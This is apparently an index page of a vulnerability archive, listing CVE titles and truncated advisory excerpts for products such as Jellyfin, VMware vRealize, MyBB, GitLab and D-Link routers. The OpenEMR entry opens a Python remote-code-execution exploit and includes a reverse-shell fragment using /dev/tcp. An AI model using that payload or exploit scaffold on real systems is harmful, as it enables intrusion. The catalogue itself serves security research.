Cisco SD-WAN vManage 缓冲区溢出漏洞（CVE-2021-1479）

...

泛微OA8 前台SQL注入漏洞

...

泛微OA9 未授权RCE漏洞

...

天擎 前台sql注入漏洞

...

天擎 越权访问漏洞

...

鹏为 CRM E4 SQL注入漏洞

...

XAMPP for Windows 命令执行漏洞

...

天清入侵防御系统 弱口令漏洞

...

网御上网行为管理系统 SQL注入漏洞

...

和信下一代云桌面VENGD 任意文件上传漏洞

...

Windows TCP/IP 拒绝服务漏洞（CVE-2021-24086）

...

帆软 V9未授权RCE漏洞

...

默安蜜罐管理平台未授权问漏洞

...

XYCMS 4.6 RCE漏洞

...

dotCMS 5.2.2 任意文件上传漏洞

...

Jellyfin 任意文件读取漏洞（CVE-2021-21402）

GHSL-2021-050: Unauthenticated abritrary file read in Jellyfin - CVE-2021-21402 Jaroslav Lobacevski Coordinated Disclosure Timeline - 2021-03-19: Issue reported to maintainers. - 2021-03-22: Version 10.7.1 with fixes was released. Summary Jellyfin allows unauthenticated arbitrary file read. Produ...

FastAdmin 框架RCE漏洞

...

VMware vRealize Operations Manager 任意文件写入漏洞（CVE-2021-21983）

...

VMware vRealize Operations Manager SSRF和文件读取漏洞（CVE-2021-21975 CVE-2021-21983）

Description On March 30, 2021, VMware published a security advisory for CVE-2021-21975 and CVE-2021-21983, two chainable vulnerabilities in its vRealize Operations Manager product. CVE-2021-21975 is an unauthenticated server-side request forgery SSRF, while CVE-2021-21983 is an authenticated...

DD-WRT 缓冲区溢出漏洞（CVE-2021-27137）

SSD Advisory – DD-WRT UPNP Buffer Overflow March 24, 2021 SSD Disclosure / Technical Lead Uncategorized TL;DR Find out how a vulnerability in DD-WRT allows an unauthenticated attacker to overflow an internal buffer used by UPNP and trigger a code execution vulnerability. Vulnerability Summary...

Apache Druid远程代码执行漏洞（CVE-2021-26919）

...

AfterLogic 多个安全漏洞（CVE-2021-26292 CVE-2021-26293 CVE-2021-26294）

CVE-2021-26292 - Public Full Path Disclosure on AfterLogic Aurora & WebMail Pro WebDAV EndPoint The severity of the issue: Medium Complexity: Easy Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO Authentication: Not required Attacks: Full Path Disclosure Resources : -...

OpenSSL 拒绝服务攻击（CVE-2021-3449）

...

Microsoft Windows本地提权漏洞（CVE-2021-1732）

CVE-2021-1732: win32kfull xxxCreateWindowEx callback out-of-bounds Mar 25, 2021 • iamelli0t CVE-2021-1732 is a 0-Day vulnerability exploited by the BITTER APT organization in one operation which was disclosed in February this year123. This vulnerability exploits a user mode callback opportunity i...

致远OA-ajax.do未授权文件上传漏洞

...

WordPress BuddyPress插件远程代码执行漏洞

...

蓝凌OA EKP 后台SQL注入漏洞（CNVD-2021-01363）

...

MessageSolution 邮件归档系统EEA 信息泄露漏洞（CNVD-2021-10543）

...

Apache OFBiz RCE漏洞（CVE-2021-26295）

...

MyBB 未授权RCE漏洞（CVE-2021-27889 CVE-2021-27890）

MyBB Remote Code Execution Chain BY SIMON SCANNELL & CARL SMITH Today SonarSource is pleased to share with you a guest contribution to our Code Security blog series. The following blog post is authored by Simon Scannell and Carl Smith -two independent security researchers- joining us in sharing...

MyBB SQL注入漏洞（CVE-2021-27946）

...

Solr未授权任意文件读取漏洞

...

GitLab 未授权RCE漏洞（CVE-2021-22192）

When rendering wiki content with certain extensions such as .rmd, renderwikicontent will call othermarkupunsafe which will end up calling GitHub::Markup.render from the github-markup gem. Files with any extension can be uploaded by checking out the wiki with git, commiting the files and pushing t...

D-Link DIR-3060 授权RCE漏洞（CVE-2021-28144）

Advisory: D-Link DIR-3060 Authenticated RCE CVE-2021-28144 MARCH 11, 2021 Overview The D-Link DIR-3060 running firmware versions below v1.11b04 is affected by a post-authentication command injection vulnerability. Anybody with authenticated access to a DIR-3060 would be able to run arbitrary syst...

F5 Networks 多个漏洞（CVE-2021-22986、CVE-2021-22987、CVE-2021-22988、CVE-2021-22989、CVE-2021-22990、CVE-2021-22991、CVE-2021-22992）

...

Git for Visual Studio远程执行代码漏洞（CVE-2021-21300）

...

D-Link DNS-320 命令注入漏洞（CVE-2020-25506）

...

WordPress The Plus Addons for Elementor插件身份验证绕过漏洞（CVE-2021-24175）

...

Joomla <=3.9.24 管理员权限命令执行(CVE-2021-23132、CVE-2020-24597)

https://github.com/HoangKien1020/CVE-2021-23132...

OpenEMR < 5.0.1 - Remote Code Execution

Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example: http://127.0.0.1/openemr." ap.addargument"-u", "--user",...

Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2018-3760)分析

漏洞公告 该漏洞由安全研究人员 Orange Tsai发现。漏洞公告来自 https://groups.google.com/forum/!topic/rubyonrails-security/ftJ--l55fM There is an information leak vulnerability in Sprockets. This vulnerability has been assigned the CVE identifier CVE-2018-3760. Versions Affected: 4.0.0.beta7 and lower, 3.7.1 and lower,...

youke365 V1.0.7 SQL注入2

...

youke365 V1.0.7 SQL注入

...

MetInfo 6.1.0 前台sql注入

...

MetInfo6.1.0后台update注入（四）

...

metinfo6.0.0后台update注入（三）

...

metinfo6.0.0后台sql注入

...

MetInfo6.1.0后台sql注入漏洞

...

Samsung SmartThings Hub video-core Camera Update Code Execution Vulnerabilities(CVE-2018-3903 - CVE-2018-3904)

Summary Multiple exploitable buffer overflow vulnerabilities exist in the camera "update" feature of video-core's HTTP server of Samsung SmartThings Hub. The video-core process incorrectly extracts fields from a user-controlled JSON payload, leading to a buffer overflow on the stack. An attacker...

Samsung SmartThings Hub video-core credentials Code Execution Vulnerability(CVE-2018-3873 - CVE-2018-3878)

Summary Multiple exploitable buffer overflow vulnerabilities exist in the credentials handler of video-core's HTTP server of Samsung SmartThings Hub. The video-core process incorrectly extracts fields from a user-controlled JSON payload, leading to a buffer overflow on the stack. An attacker can...